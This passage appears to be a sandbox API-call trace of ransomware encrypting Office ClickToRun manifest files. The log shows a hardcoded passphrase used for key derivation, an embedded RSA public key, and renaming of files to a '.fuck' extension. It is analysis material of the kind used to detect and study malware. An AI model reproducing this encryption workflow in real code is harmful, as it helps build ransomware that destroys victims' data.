[0236.180] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.180] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff760) returned 1 [0236.183] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff760, dwCertEncodingType=0x1, pInfo=0x27f6538*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6568*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6570*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb220) returned 1 [0236.184] CryptEncrypt (in: hKey=0x27eb220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.184] CryptEncrypt (in: hKey=0x27eb220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fea18*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fea18*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fea18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.184] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.184] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.184] CloseHandle (hObject=0xffffffff) returned 1 [0236.184] CloseHandle (hObject=0xffffffff) returned 1 [0236.184] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.185] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.185] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.185] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.185] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.186] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.186] CryptReleaseContext (hProv=0x27ff100, dwFlags=0x0) returned 1 [0236.186] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.186] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.186] GetLastError () returned 0x5 [0236.186] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml")) returned 0x20 [0236.187] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.187] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.187] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.187] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.188] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff870) returned 1 [0236.197] CryptCreateHash (in: hProv=0x27ff870, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.197] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.197] CryptHashData (hHash=0x27eb8a0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.197] CryptDeriveKey (in: hProv=0x27ff870, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.197] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.197] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.197] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff188) returned 1 [0236.208] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff188, dwCertEncodingType=0x1, pInfo=0x27f6608*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6638*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6640*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb0e0) returned 1 [0236.208] CryptEncrypt (in: hKey=0x27eb0e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.208] CryptEncrypt (in: hKey=0x27eb0e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fec38*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fec38*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.208] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fec38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.208] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.208] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.208] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.208] CloseHandle (hObject=0xffffffff) returned 1 [0236.208] CloseHandle (hObject=0xffffffff) returned 1 [0236.209] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.209] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.209] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg")) returned 0 [0236.210] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.fuck")) returned 0 [0236.210] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.210] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.210] CryptReleaseContext (hProv=0x27ff870, dwFlags=0x0) returned 1 [0236.210] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.210] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.210] GetLastError () returned 0x5 [0236.210] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml")) returned 0x20 [0236.211] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.211] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.211] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.212] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.212] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27feb28) returned 1 [0236.222] CryptCreateHash (in: hProv=0x27feb28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.222] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.222] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.222] CryptDeriveKey (in: hProv=0x27feb28, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.223] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.223] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.223] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff100) returned 1 [0236.225] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff100, dwCertEncodingType=0x1, pInfo=0x27f6948*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6978*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6980*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb5e0) returned 1 [0236.225] CryptEncrypt (in: hKey=0x27eb5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.226] CryptEncrypt (in: hKey=0x27eb5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff540*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff540*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.226] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff540, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.226] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2808878, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.226] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2808878*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.226] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2808878, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.226] CloseHandle (hObject=0xffffffff) returned 1 [0236.226] CloseHandle (hObject=0xffffffff) returned 1 [0236.226] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.227] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.227] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.227] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.228] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.228] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.228] CryptReleaseContext (hProv=0x27feb28, dwFlags=0x0) returned 1 [0236.228] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.228] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.228] GetLastError () returned 0x5 [0236.228] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml")) returned 0x20 [0236.235] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.235] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.236] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.236] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.236] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27feb28) returned 1 [0236.243] CryptCreateHash (in: hProv=0x27feb28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.243] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.243] CryptHashData (hHash=0x27ebce0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.243] CryptDeriveKey (in: hProv=0x27feb28, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0236.243] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.243] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.243] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff7e8) returned 1 [0236.245] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff7e8, dwCertEncodingType=0x1, pInfo=0x27f6a18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6a48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6a50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb620) returned 1 [0236.245] CryptEncrypt (in: hKey=0x27eb620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.246] CryptEncrypt (in: hKey=0x27eb620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff320*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff320*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.246] WriteFile (in: hFile=0xffffffff, 